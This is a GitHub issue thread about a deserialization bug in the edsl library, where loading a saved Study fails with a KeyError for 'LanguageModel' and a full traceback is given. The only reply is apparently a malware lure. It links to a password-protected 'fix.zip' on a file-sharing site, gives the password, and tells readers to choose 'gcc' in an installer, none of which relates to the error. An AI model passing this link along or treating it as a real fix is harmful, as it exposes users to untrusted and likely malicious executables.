### ISSUE TITLE
Study deseralization bug

### ISSUE THREAD

**Issue by johnjosephhorton** [expectedparrot/edsl#917]
```
`homo_silicus % python3 analysis/charness_rabin.py
Using existing study file data/charness_rabin.json
Traceback (most recent call last):
  File "/Users/benjaminmanning/homo_silicus/analysis/charness_rabin.py", line 11, in <module>
    with Study(
         ^^^^^^
  File "/Users/benjaminmanning/homo_silicus/.venv/lib/python3.12/site-packages/edsl/study/Study.py", line 90, in __init__
    self._load_from_file()
  File "/Users/benjaminmanning/homo_silicus/.venv/lib/python3.12/site-packages/edsl/study/Study.py", line 218, in _load_from_file
    hash: ObjectEntry.from_dict(obj_dict)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/benjaminmanning/homo_silicus/.venv/lib/python3.12/site-packages/edsl/study/ObjectEntry.py", line 80, in from_dict
    d["object"] = cls._get_class(d["object"]).from_dict(d["object"])
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/benjaminmanning/homo_silicus/.venv/lib/python3.12/site-packages/edsl/study/ObjectEntry.py", line 47, in _get_class
    return RegisterSubclassesMeta._registry[class_name]
           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^
KeyError: 'LanguageModel'
```

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
